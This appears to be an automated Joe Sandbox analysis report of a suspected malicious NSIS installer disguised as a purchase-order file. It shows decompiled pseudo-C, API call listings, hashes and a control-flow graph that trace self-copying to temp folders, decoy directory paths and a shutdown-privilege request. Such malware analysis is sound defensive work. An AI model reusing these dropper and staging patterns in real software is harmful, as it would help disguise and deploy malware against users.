                                                                      										E004063D2(_t151, _t172, 0x420ee8, 0x420ee8,  *((intOrPtr*)( *0x42a254 + 0x120)));
                                                                      										DeleteFileW(0x420ee8);
                                                                      										if( *(_t197 + 0x10) != _t151 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\PO No. 3200005919.exe", 0x420ee8, 1) != 0) {
                                                                      											E00406176(_t156, 0x420ee8, _t151);
                                                                      											E004063D2(_t151, _t172, 0x420ee8, 0x420ee8,  *((intOrPtr*)( *0x42a254 + 0x124)));
                                                                      											_t103 = E00405995(0x420ee8);
                                                                      											if(_t103 != _t151) {
                                                                      												CloseHandle(_t103);
                                                                      												 *(_t197 + 0x10) = _t151;
                                                                      											}
                                                                      										}
                                                                      										 *0x42b800 =  *0x42b800 + 1;
                                                                      										_t196 = _t196 - 1;
                                                                      									} while (_t196 != 0);
                                                                      									E00406176(_t156, _t172, _t151);
                                                                      								}
                                                                      								goto L48;
                                                                      							}
                                                                      							 *_t184 = _t151;
                                                                      							_t185 =  &(_t184[2]);
                                                                      							if(E00405D89(_t236,  &(_t184[2])) == 0) {
                                                                      								goto L48;
                                                                      							}
                                                                      							E004063B0(L"C:\\Users\\Arthur\\Overfurnished\\Tuberculisation\\Woodwose", _t185);
                                                                      							E004063B0(L"C:\\Users\\Arthur\\Overfurnished\\Tuberculisation\\Woodwose\\Circularizations126\\Iltningernes\\Mellivorous", _t185);
                                                                      							 *(_t197 + 0x10) = _t151;
                                                                      							goto L47;
                                                                      						}
                                                                      						asm("cdq");
                                                                      						asm("cdq");
                                                                      						asm("cdq");
                                                                      						_t159 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                      						_t120 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                                      						while( *_t184 != _t159 || _t184[1] != _t120) {
                                                                      							_t184 = _t184;
                                                                      							if(_t184 >= _t193) {
                                                                      								continue;
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						_t151 = 0;
                                                                      						goto L44;
                                                                      					}
                                                                      					GetWindowsDirectoryW(_t172, 0x3fb);
                                                                      					lstrcatW(_t172, L"\\Temp");
                                                                      					_t123 = E00403458(_t155, _t225);
                                                                      					_t226 = _t123;
                                                                      					if(_t123 != 0) {
                                                                      						goto L36;
                                                                      					}
                                                                      					GetTempPathW(0x3fc, _t172);
                                                                      					lstrcatW(_t172, L"Low");
                                                                      					SetEnvironmentVariableW(L"TEMP", _t172);
                                                                      					SetEnvironmentVariableW(L"TMP", _t172);
                                                                      					_t128 = E00403458(_t155, _t226);
                                                                      					_t227 = _t128;
                                                                      					if(_t128 == 0) {
                                                                      						goto L48;
                                                                      					}
                                                                      					goto L36;
                                                                      				} else {
                                                                      					do {
                                                                      						_t154 = 0x20;
                                                                      						if(_t66 != _t154) {
                                                                      							L13:
                                                                      							if( *_t155 == 0x22) {
                                                                      								_t155 = _t155 + 2;
                                                                      								_t154 = 0x22;
                                                                      							}
                                                                      							if( *_t155 != 0x2f) {
                                                                      								goto L27;
                                                                      							} else {
                                                                      								_t155 = _t155 + 2;
                                                                      								if( *_t155 == 0x53) {
                                                                      									_t148 =  *((intOrPtr*)(_t155 + 2));
                                                                      									if(_t148 == 0x20 || _t148 == 0) {
                                                                      										 *0x42a300 = 1;
                                                                      									}
                                                                      								}
                                                                      								asm("cdq");
                                                                      								asm("cdq");
                                                                      								_t169 = L"NCRC" & 0x0000ffff;
                                                                      								asm("cdq");
                                                                      								_t175 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t169;
                                                                      								if( *_t155 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
                                                                      									_t147 =  *((intOrPtr*)(_t155 + 8));
                                                                      									if(_t147 == 0x20 || _t147 == 0) {
                                                                      										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
                                                                      									}
                                                                      								}
                                                                      								asm("cdq");
                                                                      								asm("cdq");
                                                                      								_t164 = L" /D=" & 0x0000ffff;
                                                                      								asm("cdq");
                                                                      								_t178 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t164;
                                                                      								if( *(_t155 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
                                                                      									goto L27;
                                                                      								} else {
                                                                      									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
                                                                      									__eflags = _t155;
                                                                      									E004063B0(L"C:\\Users\\Arthur\\Overfurnished\\Tuberculisation\\Woodwose", _t155);
                                                                      									L32:
                                                                      									_t151 = 0;
                                                                      									goto L33;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							goto L12;
                                                                      						}
                                                                      						do {
                                                                      							L12:
                                                                      							_t155 = _t155 + 2;
                                                                      						} while ( *_t155 == _t154);
                                                                      						goto L13;
                                                                      						L27:
                                                                      						_t155 = E00405CAE(_t155, _t154);
                                                                      						if( *_t155 == 0x22) {
                                                                      							_t155 = _t155 + 2;
                                                                      						}
                                                                      						_t66 =  *_t155;
                                                                      					} while (_t66 != 0);
                                                                      					goto L32;
                                                                      				}
                                                                      				L4:
                                                                      				E0040671A(_t179); // executed
                                                                      				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
                                                                      				if( *_t179 != 0) {
                                                                      					goto L4;
                                                                      				} else {
                                                                      					E0040678A(0xa);
                                                                      					 *0x42a244 = E0040678A(8);
                                                                      					_t56 = E0040678A(6);
                                                                      					if(_t56 != _t151) {
                                                                      						_t56 =  *_t56(0x1e);
                                                                      						if(_t56 != 0) {
                                                                      							 *0x42a24f =  *0x42a24f | 0x00000040;
                                                                      						}
                                                                      					}
                                                                      					goto L8;
                                                                      				}
                                                                      			}








































                                                                      0x00403494
                                                                      0x00403495
                                                                      0x0040349c
                                                                      0x004034a0
                                                                      0x004034a8
                                                                      0x004034ac
                                                                      0x004034b8
                                                                      0x004034c1
                                                                      0x004034c6
                                                                      0x004034c9
                                                                      0x004034d0
                                                                      0x004034d7
                                                                      0x004034d7
                                                                      0x004034d0
                                                                      0x004034d9
                                                                      0x004034d9
                                                                      0x00403521
                                                                      0x00403522
                                                                      0x00403529
                                                                      0x0040352f
                                                                      0x00403545
                                                                      0x00403555
                                                                      0x0040355a
                                                                      0x00403560
                                                                      0x00403567
                                                                      0x0040357b
                                                                      0x00403580
                                                                      0x00403582
                                                                      0x00403586
                                                                      0x0040358b
                                                                      0x0040358b
                                                                      0x0040359a
                                                                      0x0040359c
                                                                      0x004035a0
                                                                      0x004035a6
                                                                      0x004036bd
                                                                      0x004036c3
                                                                      0x004036ce
                                                                      0x004036d0
                                                                      0x004036d5
                                                                      0x004036d7
                                                                      0x0040372f
                                                                      0x00403734
                                                                      0x0040373e
                                                                      0x00403745
                                                                      0x00403749
                                                                      0x004037fa
                                                                      0x004037fa
                                                                      0x004037ff
                                                                      0x00403805
                                                                      0x0040380a
                                                                      0x00403930
                                                                      0x00403936
                                                                      0x004039b4
                                                                      0x004039b4
                                                                      0x004039b9
                                                                      0x004039bc
                                                                      0x004039be
                                                                      0x004039be
                                                                      0x004039c6
                                                                      0x004039c6
                                                                      0x00403946
                                                                      0x0040394c
                                                                      0x0040394e
                                                                      0x0040395b
                                                                      0x0040396e
                                                                      0x00403976
                                                                      0x0040397e
                                                                      0x0040397e
                                                                      0x00403986
                                                                      0x0040398b
                                                                      0x00403992
                                                                      0x004039a0
                                                                      0x004039a3
                                                                      0x004039a9
                                                                      0x004039ab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403994
                                                                      0x0040399a
                                                                      0x0040399c
                                                                      0x0040399e
                                                                      0x004039ad
                                                                      0x004039af
                                                                      0x00000000
                                                                      0x004039af
                                                                      0x00000000
                                                                      0x0040399e
                                                                      0x00403992
                                                                      0x00403819
                                                                      0x00403820
                                                                      0x00403820
                                                                      0x00403755
                                                                      0x004037ea
                                                                      0x004037ea
                                                                      0x004037f6
                                                                      0x00000000
                                                                      0x004037f6
                                                                      0x00403762
                                                                      0x00403766
                                                                      0x004037b4
                                                                      0x004037b4
                                                                      0x004037b6
                                                                      0x004037be
                                                                      0x00403831
                                                                      0x00403833
                                                                      0x0040383a
                                                                      0x00403842
                                                                      0x00403842
                                                                      0x0040384d
                                                                      0x00403852
                                                                      0x00403861
                                                                      0x00403865
                                                                      0x00403866
                                                                      0x0040386f
                                                                      0x00403868
                                                                      0x00403868
                                                                      0x00403868
                                                                      0x00403875
                                                                      0x0040387b
                                                                      0x00403882
                                                                      0x0040388a
                                                                      0x0040388a
                                                                      0x00403898
                                                                      0x004038a4
                                                                      0x004038b2
                                                                      0x004038b7
                                                                      0x004038bd
                                                                      0x004038c9
                                                                      0x004038cf
                                                                      0x004038d9
                                                                      0x004038ef
                                                                      0x00403900
                                                                      0x00403906
                                                                      0x0040390d
                                                                      0x00403910
                                                                      0x00403916
                                                                      0x00403916
                                                                      0x0040390d
                                                                      0x0040391a
                                                                      0x00403921
                                                                      0x00403921
                                                                      0x00403926
                                                                      0x00403926
                                                                      0x00000000
                                                                      0x00403861
                                                                      0x004037c0
                                                                      0x004037c3
                                                                      0x004037ce
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004037d6
                                                                      0x004037e1
                                                                      0x004037e6
                                                                      0x00000000
                                                                      0x004037e6
                                                                      0x0040376f
                                                                      0x00403787
                                                                      0x00403798
                                                                      0x00403799
                                                                      0x0040379d
                                                                      0x0040379f
                                                                      0x004037ad
                                                                      0x004037b0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004037b0
                                                                      0x004037b2
                                                                      0x00000000
                                                                      0x004037b2
                                                                      0x004036df
                                                                      0x004036eb
                                                                      0x004036f0
                                                                      0x004036f5
                                                                      0x004036f7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004036ff
                                                                      0x00403707
                                                                      0x00403718
                                                                      0x00403720
                                                                      0x00403722
                                                                      0x00403727
                                                                      0x00403729
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004035ac
                                                                      0x004035ac
                                                                      0x004035ae
                                                                      0x004035b2
                                                                      0x004035bb
                                                                      0x004035bf
                                                                      0x004035c4
                                                                      0x004035c5
                                                                      0x004035c5
                                                                      0x004035ca
                                                                      0x00000000
                                                                      0x004035d0
                                                                      0x004035d1
                                                                      0x004035d6
                                                                      0x004035d8
                                                                      0x004035e0
                                                                      0x004035e7
                                                                      0x004035e7
                                                                      0x004035e0
                                                                      0x004035f8
                                                                      0x0040360b
                                                                      0x0040360c
                                                                      0x00403621
                                                                      0x00403626
                                                                      0x0040362a
                                                                      0x00403633
                                                                      0x0040363b
                                                                      0x00403642
                                                                      0x00403642
                                                                      0x0040363b
                                                                      0x0040364e
                                                                      0x00403661
                                                                      0x00403662
                                                                      0x00403677
                                                                      0x0040367d
                                                                      0x00403681
                                                                      0x00000000
                                                                      0x004036a8
                                                                      0x004036a8
                                                                      0x004036ad
                                                                      0x004036b6
                                                                      0x004036bb
                                                                      0x004036bb
                                                                      0x00000000
                                                                      0x004036bb
                                                                      0x00403681
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004035b4
                                                                      0x004035b4
                                                                      0x004035b5
                                                                      0x004035b6
                                                                      0x00000000
                                                                      0x00403689
                                                                      0x00403690
                                                                      0x00403696
                                                                      0x00403699
                                                                      0x00403699
                                                                      0x0040369a
                                                                      0x0040369d
                                                                      0x00000000
                                                                      0x004036a6
                                                                      0x004034de
                                                                      0x004034df
                                                                      0x004034eb
                                                                      0x004034f2
                                                                      0x00000000
                                                                      0x004034f4
                                                                      0x004034f6
                                                                      0x00403504
                                                                      0x00403509
                                                                      0x00403510
                                                                      0x00403514
                                                                      0x00403518
                                                                      0x0040351a
                                                                      0x0040351a
                                                                      0x00403518
                                                                      0x00000000
                                                                      0x00403510

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE ref: 004034AC
                                                                      • GetVersion.KERNEL32 ref: 004034B2
                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E5
                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403522
                                                                      • OleInitialize.OLE32(00000000), ref: 00403529
                                                                      • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403545
                                                                      • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 0040355A
                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\PO No. 3200005919.exe",00000000,?,00000006,00000008,0000000A), ref: 0040356D
                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PO No. 3200005919.exe",00000020,?,00000006,00000008,0000000A), ref: 00403594
                                                                        • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                        • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036CE
                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036DF
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004036EB
                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036FF
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403707
                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403718
                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403720
                                                                      • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403734
                                                                        • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                      • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004037FF
                                                                      • ExitProcess.KERNEL32 ref: 00403820
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403833
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403842
                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040384D
                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PO No. 3200005919.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403859
                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403875
                                                                      • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038CF
                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\PO No. 3200005919.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038E3
                                                                      • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 00403910
                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040393F
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403946
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395B
                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0040397E
                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A3
                                                                      • ExitProcess.KERNEL32 ref: 004039C6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\PO No. 3200005919.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO No. 3200005919.exe$C:\Users\user\Overfurnished\Tuberculisation\Woodwose$C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                      • API String ID: 2488574733-1810830796
                                                                      • Opcode ID: 474a237007d433326507808389763c7ec11de3b4caa67ed0dd1692d199e57bd8
                                                                      • Instruction ID: aa49a9b5ba718b736b7abce3970f6df4d0a927ceef10040f9259c4205047f8e0
                                                                      • Opcode Fuzzy Hash: 474a237007d433326507808389763c7ec11de3b4caa67ed0dd1692d199e57bd8
                                                                      • Instruction Fuzzy Hash: 3DD103B1600311ABD3206F759D45B3B3AACEB4070AF10443FF981B62D2DBBD8D558A6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 139 404d90-404ddc GetDlgItem * 2 140 404de2-404e76 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->140 141 404ffd-405004 139->141 142 404e85-404e8c DeleteObject 140->142 143 404e78-404e83 SendMessageW 140->143 144 405006-405016 141->144 145 405018 141->145 147 404e8e-404e96 142->147 143->142 146 40501b-405024 144->146 145->146 148 405026-405029 146->148 149 40502f-405035 146->149 150 404e98-404e9b 147->150 151 404ebf-404ec3 147->151 148->149 152 405113-40511a 148->152 155 405044-40504b 149->155 156 405037-40503e 149->156 153 404ea0-404ebd call 4063d2 SendMessageW * 2 150->153 154 404e9d 150->154 151->147 157 404ec5-404ef1 call 404345 * 2 151->157 159 40518b-405193 152->159 160 40511c-405122 152->160 153->151 154->153 162 4050c0-4050c3 155->162 163 40504d-405050 155->163 156->152 156->155 195 404ef7-404efd 157->195 196 404fbc-404fcf GetWindowLongW SetWindowLongW 157->196 168 405195-40519b SendMessageW 159->168 169 40519d-4051a4 159->169 165 405373-405385 call 4043ac 160->165 166 405128-405132 160->166 162->152 167 4050c5-4050cf 162->167 171 405052-405059 163->171 172 40505b-405070 call 404cde 163->172 166->165 175 405138-405147 SendMessageW 166->175 177 4050d1-4050dd SendMessageW 167->177 178 4050df-4050e9 167->178 168->169 179 4051a6-4051ad 169->179 180 4051d8-4051df 169->180 171->162 171->172 172->162 194 405072-405083 172->194 175->165 187 40514d-40515e SendMessageW 175->187 177->178 178->152 189 4050eb-4050f5 178->189 181 4051b6-4051bd 179->181 182 4051af-4051b0 ImageList_Destroy 179->182 185 405335-40533c 180->185 186 4051e5-4051f1 call 4011ef 180->186 192 4051c6-4051d2 181->192 193 4051bf-4051c0 GlobalFree 181->193 182->181 185->165 200 40533e-405345 185->200 211 405201-405204 186->211 212 4051f3-4051f6 186->212 198 405160-405166 187->198 199 405168-40516a 187->199 190 405106-405110 189->190 191 4050f7-405104 189->191 190->152 191->152 192->180 193->192 194->162 201 405085-405087 194->201 202 404f00-404f07 195->202 206 404fd5-404fd9 196->206 198->199 204 40516b-405184 call 401299 SendMessageW 198->204 199->204 200->165 205 405347-405371 ShowWindow GetDlgItem ShowWindow 200->205 207 405089-405090 201->207 208 40509a 201->208 209 404f9d-404fb0 202->209 210 404f0d-404f35 202->210 204->159 205->165 214 404ff3-404ffb call 40437a 206->214 215 404fdb-404fee ShowWindow call 40437a 206->215 218 405092-405094 207->218 219 405096-405098 207->219 222 40509d-4050b9 call 40117d 208->222 209->202 226 404fb6-404fba 209->226 220 404f37-404f6d SendMessageW 210->220 221 404f6f-404f71 210->221 227 405245-405269 call 4011ef 211->227 228 405206-40521f call 4012e2 call 401299 211->228 223 4051f8 212->223 224 4051f9-4051fc call 404d5e 212->224 214->141 215->165 218->222 219->222 220->209 229 404f73-404f82 SendMessageW 221->229 230 404f84-404f9a SendMessageW 221->230 222->162 223->224 224->211 226->196 226->206 241 40530b-40531f InvalidateRect 227->241 242 40526f 227->242 247 405221-405227 228->247 248 40522f-40523e SendMessageW 228->248 229->209 230->209 241->185 244 405321-405330 call 404cb1 call 404c99 241->244 245 405272-40527d 242->245 244->185 249 4052f3-405305 245->249 250 40527f-40528e 245->250 251 405229 247->251 252 40522a-40522d 247->252 248->227 249->241 249->245 254 405290-40529d 250->254 255 4052a1-4052a4 250->255 251->252 252->247 252->248 254->255 257 4052a6-4052a9 255->257 258 4052ab-4052b4 255->258 260 4052b9-4052f1 SendMessageW * 2 257->260 259 4052b6 258->259 258->260 259->260 260->249
                                                                      C-Code - Quality: 96%
                                                                      			E00404D90(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                      				struct HWND__* _v8;
                                                                      				struct HWND__* _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				intOrPtr _v24;
                                                                      				signed char* _v28;
                                                                      				long _v32;
                                                                      				signed int _v40;
                                                                      				int _v44;
                                                                      				signed int* _v56;
                                                                      				signed char* _v60;
                                                                      				signed int _v64;
                                                                      				long _v68;
                                                                      				void* _v72;
                                                                      				intOrPtr _v76;
                                                                      				intOrPtr _v80;
                                                                      				void* _v84;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t192;
                                                                      				intOrPtr _t195;
                                                                      				long _t201;
                                                                      				signed int _t205;
                                                                      				signed int _t216;
                                                                      				void* _t219;
                                                                      				void* _t220;
                                                                      				int _t226;
                                                                      				signed int _t231;
                                                                      				signed int _t232;
                                                                      				signed int _t233;
                                                                      				signed int _t239;
                                                                      				signed int _t241;
                                                                      				signed char _t242;
                                                                      				signed char _t248;
                                                                      				void* _t252;
                                                                      				void* _t254;
                                                                      				signed char* _t270;
                                                                      				signed char _t271;
                                                                      				long _t273;
                                                                      				long _t276;
                                                                      				int _t282;
                                                                      				signed int _t283;
                                                                      				long _t284;
                                                                      				signed int _t287;
                                                                      				signed int _t294;
                                                                      				signed char* _t302;
                                                                      				struct HWND__* _t306;
                                                                      				int _t307;
                                                                      				signed int* _t308;
                                                                      				int _t309;
                                                                      				long _t310;
                                                                      				signed int _t311;
                                                                      				void* _t313;
                                                                      				long _t314;
                                                                      				int _t315;
                                                                      				signed int _t316;
                                                                      				void* _t318;
                                                                      
                                                                      				_t306 = _a4;
                                                                      				_v12 = GetDlgItem(_t306, 0x3f9);
                                                                      				_v8 = GetDlgItem(_t306, 0x408);
                                                                      				_t318 = SendMessageW;
                                                                      				_v20 =  *0x42a288;
                                                                      				_t282 = 0;
                                                                      				_v24 =  *0x42a254 + 0x94;
                                                                      				if(_a8 != 0x110) {
                                                                      					L23:
                                                                      					if(_a8 != 0x405) {
                                                                      						_t285 = _a16;
                                                                      					} else {
                                                                      						_a12 = _t282;
                                                                      						_t285 = 1;
                                                                      						_a8 = 0x40f;
                                                                      						_a16 = 1;
                                                                      					}
                                                                      					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                      						_v16 = _t285;
                                                                      						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
                                                                      							if(( *0x42a25d & 0x00000002) != 0) {
                                                                      								L41:
                                                                      								if(_v16 != _t282) {
                                                                      									_t231 = _v16;
                                                                      									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
                                                                      										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
                                                                      									}
                                                                      									_t232 = _v16;
                                                                      									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
                                                                      										_t285 = _v20;
                                                                      										_t233 =  *(_t232 + 0x5c);
                                                                      										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                                                      											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
                                                                      										} else {
                                                                      											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								goto L48;
                                                                      							}
                                                                      							if(_a8 == 0x413) {
                                                                      								L33:
                                                                      								_t285 = 0 | _a8 != 0x00000413;
                                                                      								_t239 = E00404CDE(_v8, _a8 != 0x413);
                                                                      								_t311 = _t239;
                                                                      								if(_t311 >= _t282) {
                                                                      									_t88 = _v20 + 8; // 0x8
                                                                      									_t285 = _t239 * 0x818 + _t88;
                                                                      									_t241 =  *_t285;
                                                                      									if((_t241 & 0x00000010) == 0) {
                                                                      										if((_t241 & 0x00000040) == 0) {
                                                                      											_t242 = _t241 ^ 0x00000001;
                                                                      										} else {
                                                                      											_t248 = _t241 ^ 0x00000080;
                                                                      											if(_t248 >= 0) {
                                                                      												_t242 = _t248 & 0x000000fe;
                                                                      											} else {
                                                                      												_t242 = _t248 | 0x00000001;
                                                                      											}
                                                                      										}
                                                                      										 *_t285 = _t242;
                                                                      										E0040117D(_t311);
                                                                      										_a12 = _t311 + 1;
                                                                      										_a16 =  !( *0x42a25c) >> 0x00000008 & 0x00000001;
                                                                      										_a8 = 0x40f;
                                                                      									}
                                                                      								}
                                                                      								goto L41;
                                                                      							}
                                                                      							_t285 = _a16;
                                                                      							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                      								goto L41;
                                                                      							}
                                                                      							goto L33;
                                                                      						} else {
                                                                      							goto L48;
                                                                      						}
                                                                      					} else {
                                                                      						L48:
                                                                      						if(_a8 != 0x111) {
                                                                      							L56:
                                                                      							if(_a8 == 0x200) {
                                                                      								SendMessageW(_v8, 0x200, _t282, _t282);
                                                                      							}
                                                                      							if(_a8 == 0x40b) {
                                                                      								_t219 =  *0x42370c;
                                                                      								if(_t219 != _t282) {
                                                                      									ImageList_Destroy(_t219);
                                                                      								}
                                                                      								_t220 =  *0x423720;
                                                                      								if(_t220 != _t282) {
                                                                      									GlobalFree(_t220);
                                                                      								}
                                                                      								 *0x42370c = _t282;
                                                                      								 *0x423720 = _t282;
                                                                      								 *0x42a2c0 = _t282;
                                                                      							}
                                                                      							if(_a8 != 0x40f) {
                                                                      								L88:
                                                                      								if(_a8 == 0x420 && ( *0x42a25d & 0x00000001) != 0) {
                                                                      									_t307 = (0 | _a16 == 0x00000020) << 3;
                                                                      									ShowWindow(_v8, _t307);
                                                                      									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                                                      								}
                                                                      								goto L91;
                                                                      							} else {
                                                                      								E004011EF(_t285, _t282, _t282);
                                                                      								_t192 = _a12;
                                                                      								if(_t192 != _t282) {
                                                                      									if(_t192 != 0xffffffff) {
                                                                      										_t192 = _t192 - 1;
                                                                      									}
                                                                      									_push(_t192);
                                                                      									_push(8);
                                                                      									E00404D5E();
                                                                      								}
                                                                      								if(_a16 == _t282) {
                                                                      									L75:
                                                                      									E004011EF(_t285, _t282, _t282);
                                                                      									_v32 =  *0x423720;
                                                                      									_t195 =  *0x42a288;
                                                                      									_v60 = 0xf030;
                                                                      									_v20 = _t282;
                                                                      									if( *0x42a28c <= _t282) {
                                                                      										L86:
                                                                      										InvalidateRect(_v8, _t282, 1);
                                                                      										if( *((intOrPtr*)( *0x42921c + 0x10)) != _t282) {
                                                                      											E00404C99(0x3ff, 0xfffffffb, E00404CB1(5));
                                                                      										}
                                                                      										goto L88;
                                                                      									}
                                                                      									_t308 = _t195 + 8;
                                                                      									do {
                                                                      										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                                                      										if(_t201 != _t282) {
                                                                      											_t287 =  *_t308;
                                                                      											_v68 = _t201;
                                                                      											_v72 = 8;
                                                                      											if((_t287 & 0x00000001) != 0) {
                                                                      												_v72 = 9;
                                                                      												_v56 =  &(_t308[4]);
